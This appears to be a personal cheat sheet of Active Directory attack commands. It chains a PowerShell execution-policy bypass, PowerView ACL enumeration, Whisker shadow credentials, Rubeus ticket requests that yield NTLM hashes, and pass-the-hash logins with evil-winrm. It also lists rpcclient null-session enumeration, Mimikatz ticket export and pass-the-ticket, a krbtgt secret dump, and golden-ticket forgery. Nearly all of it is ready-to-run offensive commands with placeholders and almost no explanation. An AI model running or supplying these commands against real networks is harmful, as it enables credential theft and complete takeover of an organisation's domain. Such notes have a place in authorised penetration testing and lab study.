powershell -ep bypass # bypass script exec
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids # Privileges enum
# filter by user
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "<user>" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
# need Genericwrite privilege
.\Whisker.exe add /target:<user>
# output - Rubeus commands
.\Rubeus.exe asktgt /user:<user /certificate:<cert> /password:"<pass>" /domain:<domain> /dc:<dc> /getcredentials /show
# output - NTLM hash
evil-winrm -i <IPv> -u <user> -H <NTLM-hash>
rpcclient -U "" <IP> -N # Null session+sin username
enumdomusers
enumdomgroups
privilege::debug
sekurlsa::tickets /export
kerberos::ptt <ticket>
# exit
klist #check
privilege::debug
sadump::lsa /inject /<user>:krbtgt
Kerberos::golden /user:<Administrator> /domain:<domain-name> /sid:<domain-sid> /krbtgt:<NTLM hash> /id:500
misc::cmd